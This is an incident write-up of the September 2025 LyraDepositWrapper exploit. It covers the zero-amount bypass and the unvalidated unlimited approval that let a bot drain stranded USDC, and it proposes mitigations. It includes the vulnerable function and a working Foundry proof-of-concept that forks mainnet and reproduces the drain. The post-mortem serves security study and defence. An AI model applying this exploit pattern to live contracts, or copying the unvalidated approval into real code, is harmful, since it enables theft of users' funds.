LyraDepositWrapper

Total Losses

$1.0M+

Date

September 16, 2025

Network

ethereum

Step-by-step

This exploit was a combination of user error and a vulnerability in the LyraDepositWrapper contract. A MEV bot was able to drain $1 million in USDC after a user accidentally transferred the funds directly to the contract address instead of using its intended deposit function.

User Error (Pre-condition): A user, funded from the FalconX exchange, mistakenly sent $1,000,000 USDC directly to the LyraDepositWrapper contract address. This action did not trigger any contract logic and left the funds in the contract’s balance.
Vulnerability Discovery: A MEV bot detected this balance in the contract.
Exploitation: The bot called the depositToLyra() function with:
- amount: 0
- socketVault: The attacker’s own address.
Arbitrary Approval: The function’s logic bypassed the initial token transfer because the amount was zero, but proceeded to grant an unlimited USDC approval to the attacker’s address (socketVault).
Draining Funds: With the approval granted, the attacker immediately called transferFrom on the USDC contract to pull the entire $1M balance from the LyraDepositWrapper to their own wallet.

Detailed Description

The vulnerability existed within the depositToLyra function, which lacked validation checks. The function was designed to transfer tokens from a user, approve a socketVault for bridging, and then initiate the deposit.

function depositToLyra(
    address token,
    address socketVault,
    bool isSCW,
    uint256 amount,
    uint256 gasLimit,
    address connector
) external payable {
    //  If `amount` is 0,  transferFrom does not revert.
    IERC20(token).transferFrom(msg.sender, address(this), amount);
    
    // The `socketVault` parameter is not validated and can be any address.
    IERC20(token).approve(socketVault, type(uint256).max);

    address recipient = _getL2Receiver(isSCW);

    ISocketVault(socketVault).depositToAppChain{value: msg.value}(recipient, amount, gasLimit, connector);
}

LyraDepositWrapper.sol

The attack was possible due to unvalidated approval, The function immediately proceeded to IERC20(token).approve(socketVault, type(uint256).max). Since the socketVault parameter was controlled by the caller and not validated against a whitelist of trusted addresses, the attacker could simply provide their own address.

LYRA_DEPOSIT_WRAPPER.depositToLyra{value: 0}(
    address(USDC),
    ATTACKER, // socketVault: The address to grant approval to.
    false,
    0,        // amount: Bypasses the transferFrom.
    1,
    address(WETH)
);

LyraDepositWrapper.attack.sol

The final step was a simple transferFrom call to drain the $1 million that the user had mistakenly deposited.

Possible mitigations

Validating Inputs: Implement strict checks to validate the socketVault and token addresses are trusted, and require amount > 0. This prevents both arbitrary approval targets and the zero-amount bypass.
Use Scoped Approvals: Replace infinite approvals with approvals for only the specific amount being deposited or reset to zero at the end of the call.

LyraDepositWrapper.attack.sol

solidity

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import {TestHarness} from "../../TestHarness.sol";
import {TokenBalanceTracker} from "../../modules/TokenBalanceTracker.sol";
import {IERC20} from "../../interfaces/IERC20.sol";
import {IWETH9} from "../../interfaces/IWETH9.sol";

interface ILyraDepositWrapper {
    function depositToLyra(
        address token,
        address socketVault,
        bool isSCW,
        uint256 amount,
        uint256 gasLimit,
        address connector
    ) external payable;
}

contract Exploit_LyraDepositWrapper is TestHarness, TokenBalanceTracker {
    
    address private constant ATTACKER =
        0x62005500Af4CFB0077AC0090002F630055Ba001D;
    ILyraDepositWrapper private constant LYRA_DEPOSIT_WRAPPER =
        ILyraDepositWrapper(0x18a0f3F937DD0FA150d152375aE5A4E941d1527b);

    IERC20 private constant USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
    IWETH9 private constant WETH =
        IWETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);

    function setUp() public {
        // Fork the chain one block before the exploit occurred
        cheat.createSelectFork(vm.envString("RPC_URL"), 23_377_072);

        deal(address(this), 0);
        // Set up token balance tracking for logging.
        addTokenToTracker(address(USDC));
    }

    function test_attack() public {
        console.log("------- INITIAL BALANCES -------");
        
        logBalancesWithLabel("Attacker", ATTACKER);
        logBalancesWithLabel(
            "LyraDepositWrapper",
            address(LYRA_DEPOSIT_WRAPPER)
        );
         uint256 initialWrapperBalance = USDC.balanceOf(
            address(LYRA_DEPOSIT_WRAPPER)
        );

        console.log(
            "\n------- STEP 1: Call depositToLyra with malicious parameters to gain approval -------"
        );
       
        vm.startPrank(ATTACKER);
        LYRA_DEPOSIT_WRAPPER.depositToLyra{value: 0}(
            address(USDC),
            ATTACKER, // socketVault: The address to grant approval
            false,    // isSCW
            0,        // allow amount zero 
            1,        // gasLimit
            address(WETH) // connector 
        );

        
        uint256 allowance = USDC.allowance(
            address(LYRA_DEPOSIT_WRAPPER),
            ATTACKER
        );
        assertEq(
            allowance,
            type(uint256).max,
            "Attacker should have max allowance"
        );
        console.log(
            "\n------- STEP 2: Use the approval to drain the contract's USDC balance -------"
        );
        // With the allowance granted, the attacker can now call `transferFrom` on the USDC
        uint256 balanceToDrain = USDC.balanceOf(address(LYRA_DEPOSIT_WRAPPER));
        USDC.transferFrom(
            address(LYRA_DEPOSIT_WRAPPER),
            ATTACKER,
            balanceToDrain 
        );

        console.log("\n------- FINAL STATE -------");
        logBalancesWithLabel("Attacker final balance", ATTACKER);
        logBalancesWithLabel(
            "LyraDepositWrapper final balance",
            address(LYRA_DEPOSIT_WRAPPER)
        );

        assertEq(
            USDC.balanceOf(address(LYRA_DEPOSIT_WRAPPER)),
            0,
            "Wrapper contract should be empty"
        );
        assertGe(
            USDC.balanceOf(ATTACKER),
            initialWrapperBalance,
            "Attacker should have drained the funds"
        );

    }
}

Reproduction Command

                
                  forge test --match-contract Exploit_LyraDepositWrapper -vvv

Step-by-step

Detailed Description

Possible mitigations

File Icon LyraDepositWrapper.attack.sol

Code Icon Reproduction Command

LyraDepositWrapper.attack.sol

Reproduction Command